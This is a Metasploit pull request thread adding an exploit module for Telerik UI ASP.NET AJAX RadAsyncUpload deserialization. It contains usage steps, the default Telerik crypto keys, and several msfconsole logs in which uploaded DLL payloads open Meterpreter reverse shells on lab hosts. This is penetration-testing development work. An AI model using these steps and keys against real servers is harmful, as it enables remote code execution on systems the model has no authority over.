Add exploit for Telerik UI ASP.NET AJAX RadAsyncUpload (RAU) Deserialization
rapid7/metasploit-framework pull request #14229
Opened 2020-10-07 18:15 UTC by zeroSteiner

This adds an exploit for Telerik UI ASP.NET AJAX RadAsyncUpload (RAU) Deserialization which will upload and execute a payload file. For this exploit to work, it is necessary for the attacker to know the crypto keys and the target version. The default values of the crypto keys were disclosed in CVE-2017-11317 which this module checks for and reports.  The target version can be enumerated if the crypto keys are correctly set, that is to say they are either the default values from CVE-2017-11317 or the attacker knows them through some means. With the ability to upload a file, an attacker can have it loaded by leveraging a JSON .NET deserialization flaw. Starting in version 2019.3.1023 the serialization types can be allow-listed through an opt-in feature, while starting in version 2020.1.114 the allow-list feature is enabled by default. In either case, the allow-list can be explicitly configured with the setting necessary for exploitation by this module for testing purposes. See the "Configuring Telerik UI ASP.NET AJAX" section of the module docs for more information.

## Mixed Mode Assembly
To exploit the deserialization flaw, it's necessary to upload a DLL that can then be loaded. This DLL must be a Mixed Mode Assembly. I opted to create new templates for this located at `data/templates/template_x##_windows_mixed_mode.dll`. These new templates use the existing source code of the standard DLL template,  and are compiled using Visual Studio 2019 Pro with the included batch script. This makes Mixed Mode Assembly DLLs that can be used for this exploit that are also compatible with Metasploit's existing DLL generation routine. There's a README file in the new source code directory with some additional information.

## Verification

I tested this with Telerik UI ASP.NET AJAX version 2020.3.915 (the latest).

<details>
<summary>Testing Installation Steps</summary>

1. Install the prerequisites
    * Internet Information Services (IIS)
    * Visual Studio 2019
    * SQL Server Express
1. [Download](https://www.telerik.com/download) and install the trial version of "Telerik UI for ASP.NET AJAX"
    * Select Visual Studio 2019 Support and Local Demos
1. Edit the `web.config` file to configure it to be vulnerable, these details are in the "Configuring Telerik UI ASP.NET AJAX" section of the module docs
1. Open the `TelerikUI_for_AspNetAjax_Demos_VS2017.sln` project file located in `C:\Program Files (x86)\Progress\Telerik UI for ASP.NET AJAX R3 2020\Live Demos`
    1. Use the green play button to run it in "Local IIS...". If there are build errors, select "Yes" to continue and run the last successful build.
</details>

- [ ]  Start msfconsole
- [ ]  Do: `use exploit/windows/http/telerik_rau_deserialization `
- [ ]  Set the `RHOSTS` and `PAYLOAD` options
- [ ]  Set any additional options as required by the previously selected payload
- [ ]  Optionally set the `VHOST`, `RPORT` and `SSL` options as appropriate
- [ ]  Set the `VERSION` option if it is known
- [ ]  Run the exploit

## Example Output

```
msf6 > use exploit/windows/http/telerik_rau_deserialization 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/telerik_rau_deserialization) > set RHOSTS 192.168.159.129
RHOSTS => 192.168.159.129
msf6 exploit(windows/http/telerik_rau_deserialization) > set RPORT 8080
RPORT => 8080
msf6 exploit(windows/http/telerik_rau_deserialization) > set SSL false
[!] Changing the SSL option's value may require changing RPORT!
SSL => false
msf6 exploit(windows/http/telerik_rau_deserialization) > set VHOST win10dev
VHOST => win10dev
msf6 exploit(windows/http/telerik_rau_deserialization) > set VERBOSE true
VERBOSE => true
msf6 exploit(windows/http/telerik_rau_deserialization) > check
[*] Enumerating the Telerik UI ASP.NET AJAX version, this will fail if the keys are incorrect
[*] Checking version: 2020.3.915
[+] Uploaded 0 bytes to: C:\Windows\Temp\B9MWZKcH4FGUFEb1ioFQnZollFxhhl3Pr.dll.tmp
[+] The Telerik UI ASP.NET AJAX version has been identified as: 2020.3.915
[*] Server is using default crypto keys and is vulnerable to CVE-2017-11317
[*] 192.168.159.129:8080 - The service is running, but could not be validated.
[!] This exploit may require manual cleanup of 'C:\Windows\Temp\B9MWZKcH4FGUFEb1ioFQnZollFxhhl3Pr.dll.tmp' on the target
msf6 exploit(windows/http/telerik_rau_deserialization) > set VERSION 2020.3.915
VERSION => 2020.3.915
msf6 exploit(windows/http/telerik_rau_deserialization) > set LHOST 192.168.159.128 
LHOST => 192.168.159.128
msf6 exploit(windows/http/telerik_rau_deserialization) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] Uploaded 0 bytes to: C:\Windows\Temp\B9MWZKcH4FGUFEb1ioFQnZollFxhhl3Pr.dll.tmp
[*] Server is using default crypto keys and is vulnerable to CVE-2017-11317
[!] The service is running, but could not be validated.
[+] Uploaded 29184 bytes to: C:\Windows\Temp\B9MWZKcH4FGUFEb1ioFQnZollFxhhl3Pr.dll.tmp
[*] Executing the payload...
[*] Sending stage (175174 bytes) to 192.168.159.129
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.129:49466) at 2020-10-07 10:44:31 -0400
[!] This exploit may require manual cleanup of 'C:\Windows\Temp\B9MWZKcH4FGUFEb1ioFQnZollFxhhl3Pr.dll.tmp' on the target
[!] This exploit may require manual cleanup of 'C:\Windows\Temp\B9MWZKcH4FGUFEb1ioFQnZollFxhhl3Pr.dll.tmp' on the target
[!] This exploit may require manual cleanup of 'C:\Windows\Temp\B9MWZKcH4FGUFEb1ioFQnZollFxhhl3Pr.dll.tmp' on the target
meterpreter > getuid
Server username: WIN10DEV\smcintyre
meterpreter > sysinfo
Computer        : WIN10DEV
OS              : Windows 10 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter >
```

2020-10-07 18:18 UTC, adfoster-r7 commented on modules/exploits/windows/http/telerik_rau_deserialization.rb
> +    return CheckCode::Safe unless res.get_json_document&.dig('message') =~ /RadAsyncUpload handler is registered succesfully/
```suggestion
    return CheckCode::Safe unless res.get_json_document&.dig('message') =~ /RadAsyncUpload handler is registered successfully/
```

2020-10-07 18:20 UTC, adfoster-r7 commented on modules/exploits/windows/http/telerik_rau_deserialization.rb
> +    return CheckCode::Safe unless res.get_json_document&.dig('message') =~ /RadAsyncUpload handler is registered succesfully/
Ah, I see - I'm guessing this is a typo in the API response? 😄

2020-10-07 18:22 UTC, wvu-r7 commented on modules/exploits/windows/http/telerik_rau_deserialization.rb
> +    return CheckCode::Safe unless res.get_json_document&.dig('message') =~ /RadAsyncUpload handler is registered succesfully/
@adfoster-r7: Source? I blame IDEs. :)

2020-10-07 18:33 UTC, adfoster-r7 commented on modules/exploits/windows/http/telerik_rau_deserialization.rb
> +    return CheckCode::Safe unless res.get_json_document&.dig('message') =~ /RadAsyncUpload handler is registered succesfully/
Yeah, seems so - looks like this typo has been in telerik's API since at least 2014:

https://www.telerik.com/forums/asyncuploader-issue

![image](https://user-images.githubusercontent.com/60357436/95372396-6628be80-08d3-11eb-903c-6d6530782027.png)

Checking out the versions list that's attached to this PR, it seems like it goes back to 2007 👍 

I don't know where the source code for telerik exists, but their examples on Github have the same typo everywhere:
https://github.com/search?q=org%3Atelerik+succesfully&type=Code

2020-10-19 19:01 UTC, wvu-r7 requested changes
Looks good, just a few things.

2020-10-19 19:01 UTC, wvu-r7 commented on modules/exploits/windows/http/telerik_rau_deserialization.rb
> +    File.open(File.join(Msf::Config.data_directory, 'wordlists', 'telerik_ui_asp_net_ajax_versions.txt'), 'rb').each_line do |version|
`File.readlines` is also an option.

2020-10-19 19:07 UTC, zeroSteiner commented on documentation/modules/exploit/windows/http/telerik_rau_deserialization.md
> +    &lt;!-- ... include the remaining configuration options --&gt;
If I include unescaped XML here, then the output won't show up in the rendered markdown. See the example below where the left is escaped as it is now and the right is unescaped as you are suggesting.
![image](https://user-images.githubusercontent.com/2058303/96500355-b92c3b00-121c-11eb-9c80-70e54a13bcdb.png)

2020-10-19 19:11 UTC, wvu-r7 commented on documentation/modules/exploit/windows/http/telerik_rau_deserialization.md
> +    &lt;!-- ... include the remaining configuration options --&gt;
Interesting, must be the flawed Markdown-to-HTML conversion. GitHub renders it like so:

![image](https://user-images.githubusercontent.com/4551878/96500750-effe5300-1214-11eb-9afe-ff9ef0f113c0.png)

2020-10-19 19:14 UTC, wvu-r7 commented on documentation/modules/exploit/windows/http/telerik_rau_deserialization.md
> +    &lt;!-- ... include the remaining configuration options --&gt;
What happens in the local render if you specify `xml` as the syntax for the code block?

```xml
  <appSettings>
    <!-- Configured to replicate CVE-2017-11317 -->
    <add key="Telerik.AsyncUpload.ConfigurationEncryptionKey" value="PrivateKeyForEncryptionOfRadAsyncUploadConfiguration"/>
    <add key="Telerik.Upload.ConfigurationHashKey" value="PrivateKeyForHashOfUploadConfiguration"/>
    <!-- Configured to replicate CVE-2019-18935 -->
    <add key="Telerik.Upload.AllowedCustomMetaDataTypes" value="System.Configuration.Install.AssemblyInstaller"/>
    <!-- ... include the remaining configuration options -->
```

2020-10-19 19:21 UTC, zeroSteiner commented on documentation/modules/exploit/windows/http/telerik_rau_deserialization.md
> +    &lt;!-- ... include the remaining configuration options --&gt;
Starting the block with ` ```xml ` doesn't change anything for me, the rendered output is just the blank block again.

> Interesting, must be the flawed Markdown-to-HTML conversion. GitHub renders it like so:
Yeah the GitHub render is a bit more advanced than alot of the ones I've seen that strictly follow the traditional flavor of markdown. The aptly-named GitHub-Flavored-Markdown (GFM) supports quite a few features that aren't in the [original spec](https://daringfireball.net/projects/markdown/).

2020-10-19 19:43 UTC, wvu-r7 commented on documentation/modules/exploit/windows/http/telerik_rau_deserialization.md
> +    &lt;!-- ... include the remaining configuration options --&gt;
Yeah, GFM is more advanced, but this almost feels like a bug. It's data in a code block.

2020-10-19 20:30 UTC, zeroSteiner commented on documentation/modules/exploit/windows/http/telerik_rau_deserialization.md
> +    &lt;!-- ... include the remaining configuration options --&gt;
Agreed. It should probably be addressed in a separate PR though. Do you want to wait for that bug fix before landing this module?

2020-10-19 20:35 UTC, wvu-r7 commented on documentation/modules/exploit/windows/http/telerik_rau_deserialization.md
> +    &lt;!-- ... include the remaining configuration options --&gt;
Nah, I figured it out. I'm sure others will.

2020-10-19 20:37 UTC, wvu-r7 commented on documentation/modules/exploit/windows/http/telerik_rau_deserialization.md
> +    &lt;!-- ... include the remaining configuration options --&gt;
And it's an [upstream gem](https://github.com/vmg/redcarpet). I'm not waiting for anything.

2020-10-19 20:39 UTC, wvu-r7 commented on modules/exploits/windows/http/telerik_rau_deserialization.rb
> +      }, 0
You can set this to a low value like `1` if you want it to time out quickly while providing a response you can evaluate.

2020-10-19 20:41 UTC, wvu-r7 commented on modules/exploits/windows/http/telerik_rau_deserialization.rb
> +          'SSL' => true
Default `RPORT` is still `80`. Did you want to update it?

2020-10-19 20:58 UTC, wvu-r7 commented on modules/exploits/windows/http/telerik_rau_deserialization.rb
> +        'Arch' => ARCH_X86,
It looks like you provided an x64 template. Do `ARCH_X64` payloads work?

2020-10-19 21:03 UTC, wvu-r7 commented on modules/exploits/windows/http/telerik_rau_deserialization.rb
> +        'Arch' => ARCH_X86,
(They do, just tested.)

2020-10-19 21:20 UTC, zeroSteiner commented on modules/exploits/windows/http/telerik_rau_deserialization.rb
> +        'Arch' => ARCH_X86,
That's really surprising. I would not have expected them to because the payload DLL would have presumably needed to match the host process architecture in order to be loaded. I'd like to look into this a bit more.

2020-10-19 21:28 UTC, wvu-r7 commented on modules/exploits/windows/http/telerik_rau_deserialization.rb
> +        'Arch' => ARCH_X86,
```
msf6 exploit(windows/http/telerik_rau_deserialization) > options

Module options (exploit/windows/http/telerik_rau_deserialization):

   Name                Current Setting                                       Required  Description
   ----                ---------------                                       --------  -----------
   DESTINATION         C:\Windows\Temp                                       yes       The destination folder for the upload
   FILE_NAME                                                                 no        The base file name for the upload (default will be random)
   Proxies                                                                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RAU_ENCRYPTION_KEY  PrivateKeyForEncryptionOfRadAsyncUploadConfiguration  yes       The encryption key for the RAU configuration data
   RAU_SIGNING_KEY     PrivateKeyForHashOfUploadConfiguration                yes       The signing key for the RAU configuration data
   RHOSTS              192.168.123.152                                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT               8080                                                  yes       The target port (TCP)
   SSL                 false                                                 no        Negotiate SSL/TLS for outgoing connections
   VERSION                                                                   no        The Telerik UI ASP.NET AJAX version
   VHOST                                                                     no        HTTP server virtual host


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.123.1    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf6 exploit(windows/http/telerik_rau_deserialization) > run

[*] Started reverse TCP handler on 192.168.123.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Enumerating the Telerik UI ASP.NET AJAX version, this will fail if the keys are incorrect
[*] Checking version: 2020.3.915
[+] Uploaded 0 bytes to: C:\Windows\Temp\ZLCzdmaV.dll.tmp
[+] The Telerik UI ASP.NET AJAX version has been identified as: 2020.3.915
[*] Server is using default crypto keys and is vulnerable to CVE-2017-11317
[!] The service is running, but could not be validated.
[+] Uploaded 30208 bytes to: C:\Windows\Temp\ZLCzdmaV.dll.tmp
[*] Executing the payload...
[*] Sending stage (200262 bytes) to 192.168.123.152
[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.152:59195) at 2020-10-19 16:02:43 -0500
[!] This exploit may require manual cleanup of 'C:\Windows\Temp\ZLCzdmaV.dll.tmp' on the target
[!] This exploit may require manual cleanup of 'C:\Windows\Temp\ZLCzdmaV.dll.tmp' on the target

meterpreter >
[+] Deleted C:\Windows\Temp\ZLCzdmaV.dll.tmp
```

Could have been an orphaned session.

2020-10-19 21:35 UTC, wvu-r7 commented on modules/exploits/windows/http/telerik_rau_deserialization.rb
> +        'Arch' => ARCH_X86,
I'm struggling to get a session reliably, but here's another with `sysinfo`:

```
msf6 exploit(windows/http/telerik_rau_deserialization) > run

[*] Started reverse TCP handler on 192.168.123.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Enumerating the Telerik UI ASP.NET AJAX version, this will fail if the keys are incorrect
[*] Checking version: 2020.3.915
[+] Uploaded 0 bytes to: C:\Windows\Temp\45dYhV9AHmPCRznVOCXouInoxOEsBOFz.dll.tmp
[+] The Telerik UI ASP.NET AJAX version has been identified as: 2020.3.915
[*] Server is using default crypto keys and is vulnerable to CVE-2017-11317
[!] The service is running, but could not be validated.
[+] Uploaded 30208 bytes to: C:\Windows\Temp\45dYhV9AHmPCRznVOCXouInoxOEsBOFz.dll.tmp
[*] Executing the payload...
[*] Sending stage (200262 bytes) to 192.168.123.155
[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.155:63754) at 2020-10-19 16:33:39 -0500
[!] This exploit may require manual cleanup of 'C:\Windows\Temp\45dYhV9AHmPCRznVOCXouInoxOEsBOFz.dll.tmp' on the target
[!] This exploit may require manual cleanup of 'C:\Windows\Temp\45dYhV9AHmPCRznVOCXouInoxOEsBOFz.dll.tmp' on the target

meterpreter > getuid
Server username: IIS APPPOOL\Telerik UI for ASP.NET AJAX
meterpreter > sysinfo
Computer        : WIN-G2PGASM3QFA
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : GIBSON
Logged On Users : 17
Meterpreter     : x64/windows
meterpreter >
```

2020-10-19 21:38 UTC, wvu-r7 commented on modules/exploits/windows/http/telerik_rau_deserialization.rb
> +        'Arch' => ARCH_X86,
A little more info with an HTTPS stager:

```
msf6 exploit(windows/http/telerik_rau_deserialization) > run

[*] Started HTTPS reverse handler on https://192.168.123.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Enumerating the Telerik UI ASP.NET AJAX version, this will fail if the keys are incorrect
[*] Checking version: 2020.3.915
[+] Uploaded 0 bytes to: C:\Windows\Temp\BZaEr.dll.tmp
[+] The Telerik UI ASP.NET AJAX version has been identified as: 2020.3.915
[*] Server is using default crypto keys and is vulnerable to CVE-2017-11317
[!] The service is running, but could not be validated.
[+] Uploaded 30208 bytes to: C:\Windows\Temp\BZaEr.dll.tmp
[*] Executing the payload...
[*] https://192.168.123.1:4444 handling request from 192.168.123.158; (UUID: teztdyoj) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 2 opened (192.168.123.1:4444 -> 192.168.123.158:63613) at 2020-10-19 16:38:06 -0500
[!] This exploit may require manual cleanup of 'C:\Windows\Temp\BZaEr.dll.tmp' on the target
[!] This exploit may require manual cleanup of 'C:\Windows\Temp\BZaEr.dll.tmp' on the target

meterpreter > getuid
Server username: IIS APPPOOL\Telerik UI for ASP.NET AJAX
meterpreter > sysinfo
Computer        : WIN-G2PGASM3QFA
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : GIBSON
Logged On Users : 17
Meterpreter     : x64/windows
meterpreter >
```

2020-10-19 21:40 UTC, wvu-r7 commented on modules/exploits/windows/http/telerik_rau_deserialization.rb
> +        'Arch' => ARCH_X86,
I'm running the Telerik demo site in IIS directly, which is running as an x64 process.

2020-10-19 21:56 UTC, wvu-r7 commented on modules/exploits/windows/http/telerik_rau_deserialization.rb
> +        'Notes' => {
Thoughts on `Reliability`? I haven't been getting a session reliably, but I can get one.

2020-10-19 21:56 UTC, zeroSteiner commented on modules/exploits/windows/http/telerik_rau_deserialization.rb
> +        'Arch' => ARCH_X86,
I guess that makes sense if you're running it a different way then I had been. Are you also able to use the x86 payload, or does it look like the attacker needs to guess the correct architecture?

2020-10-19 22:38 UTC, wvu-r7 commented on modules/exploits/windows/http/telerik_rau_deserialization.rb
> +        'Arch' => ARCH_X86,
I didn't have any success with the x86 payload, and the x64 payload has worked only a few times for me. I've tried tuning `WfsDelay` and trying other payloads.

2020-10-20 17:17 UTC, wvu-r7 commented on modules/exploits/windows/http/telerik_rau_deserialization.rb
> +      'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'),
Hey, can you register `TARGETURI`?

2020-10-20 17:57 UTC, wvu-r7 approved these changes

2020-10-20 17:58 UTC, wvu-r7 commented on modules/exploits/windows/http/telerik_rau_deserialization.rb
> +        'Arch' => ARCH_X86,
For the record, we added `ARCH_X64` and defaulted to it, as that worked for me in both IIS and VS.

2020-10-20 18:12 UTC, wvu-r7 commented
# Testing

## Deployed in IIS

```
msf6 exploit(windows/http/telerik_rau_deserialization) > options

Module options (exploit/windows/http/telerik_rau_deserialization):

   Name                Current Setting                                       Required  Description
   ----                ---------------                                       --------  -----------
   DESTINATION         C:\Windows\Temp                                       yes       The destination folder for the upload
   FILE_NAME                                                                 no        The base file name for the upload (default will be random)
   Proxies                                                                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RAU_ENCRYPTION_KEY  PrivateKeyForEncryptionOfRadAsyncUploadConfiguration  yes       The encryption key for the RAU configuration data
   RAU_SIGNING_KEY     PrivateKeyForHashOfUploadConfiguration                yes       The signing key for the RAU configuration data
   RHOSTS              192.168.123.173                                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT               8080                                                  yes       The target port (TCP)
   SSL                 false                                                 no        Negotiate SSL/TLS for outgoing connections
   TARGETURI           /                                                     yes       The base path to the web application
   VERSION                                                                   no        The Telerik UI ASP.NET AJAX version
   VHOST                                                                     no        HTTP server virtual host


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.123.1    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf6 exploit(windows/http/telerik_rau_deserialization) > run

[*] Started reverse TCP handler on 192.168.123.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Enumerating the Telerik UI ASP.NET AJAX version, this will fail if the keys are incorrect
[*] Checking version: 2020.3.915
[+] Uploaded 0 bytes to: C:\Windows\Temp\3Pb9Sh9m.dll.tmp
[+] The Telerik UI ASP.NET AJAX version has been identified as: 2020.3.915
[*] Server is using default crypto keys and is vulnerable to CVE-2017-11317
[!] The service is running, but could not be validated.
[+] Uploaded 30208 bytes to: C:\Windows\Temp\3Pb9Sh9m.dll.tmp
[*] Executing the payload...
[*] Sending stage (200262 bytes) to 192.168.123.173
[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.173:62907) at 2020-10-20 13:06:34 -0500
[!] This exploit may require manual cleanup of 'C:\Windows\Temp\3Pb9Sh9m.dll.tmp' on the target
[!] This exploit may require manual cleanup of 'C:\Windows\Temp\3Pb9Sh9m.dll.tmp' on the target

meterpreter > getuid
Server username: IIS APPPOOL\Telerik UI for ASP.NET AJAX
meterpreter > sysinfo
Computer        : WIN-G2PGASM3QFA
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : GIBSON
Logged On Users : 16
Meterpreter     : x64/windows
meterpreter >
```

## Deployed in Visual Studio

A pivot was necessary to reach the development server.

```
msf6 exploit(windows/http/telerik_rau_deserialization) > options

Module options (exploit/windows/http/telerik_rau_deserialization):

   Name                Current Setting                                       Required  Description
   ----                ---------------                                       --------  -----------
   DESTINATION         C:\Windows\Temp                                       yes       The destination folder for the upload
   FILE_NAME                                                                 no        The base file name for the upload (default will be random)
   Proxies                                                                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RAU_ENCRYPTION_KEY  PrivateKeyForEncryptionOfRadAsyncUploadConfiguration  yes       The encryption key for the RAU configuration data
   RAU_SIGNING_KEY     PrivateKeyForHashOfUploadConfiguration                yes       The signing key for the RAU configuration data
   RHOSTS              127.0.0.1                                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT               62942                                                 yes       The target port (TCP)
   SSL                 false                                                 no        Negotiate SSL/TLS for outgoing connections
   TARGETURI           /TelerikUI_for_AspNetAjax                             yes       The base path to the web application
   VERSION                                                                   no        The Telerik UI ASP.NET AJAX version
   VHOST               localhost                                             no        HTTP server virtual host


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.123.1    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf6 exploit(windows/http/telerik_rau_deserialization) > run

[*] Started reverse TCP handler on 192.168.123.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Enumerating the Telerik UI ASP.NET AJAX version, this will fail if the keys are incorrect
[*] Checking version: 2020.3.915
[+] Uploaded 0 bytes to: C:\Windows\Temp\wFGTopoTsTqbufbD0l3ZUmxwwIe4RYr.dll.tmp
[+] The Telerik UI ASP.NET AJAX version has been identified as: 2020.3.915
[*] Server is using default crypto keys and is vulnerable to CVE-2017-11317
[!] The service is running, but could not be validated.
[+] Uploaded 30208 bytes to: C:\Windows\Temp\wFGTopoTsTqbufbD0l3ZUmxwwIe4RYr.dll.tmp
[*] Executing the payload...
[*] Sending stage (200262 bytes) to 192.168.123.173
[*] Meterpreter session 2 opened (192.168.123.1:4444 -> 192.168.123.173:62995) at 2020-10-20 13:10:27 -0500
[!] This exploit may require manual cleanup of 'C:\Windows\Temp\wFGTopoTsTqbufbD0l3ZUmxwwIe4RYr.dll.tmp' on the target
[!] This exploit may require manual cleanup of 'C:\Windows\Temp\wFGTopoTsTqbufbD0l3ZUmxwwIe4RYr.dll.tmp' on the target

meterpreter > getuid
Server username: GIBSON\Administrator
meterpreter > sysinfo
Computer        : WIN-G2PGASM3QFA
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : GIBSON
Logged On Users : 16
Meterpreter     : x64/windows
meterpreter >
```

:rocket:

2020-10-20 18:13 UTC, wvu-r7 commented on modules/exploits/windows/http/telerik_rau_deserialization.rb
> +        'Arch' => ARCH_X86,
See https://github.com/rapid7/metasploit-framework/pull/14229#issuecomment-713044516 for testing notes.

2020-10-20 18:25 UTC, merged

2020-10-20 18:25 UTC, wvu-r7 commented
# Release Notes

Added an exploit for [Telerik UI for ASP.NET AJAX](https://www.telerik.com/products/aspnet-ajax.aspx), leveraging [CVE-2017-11317](https://nvd.nist.gov/vuln/detail/CVE-2017-11317) and [CVE-2019-18935](https://nvd.nist.gov/vuln/detail/CVE-2019-18935).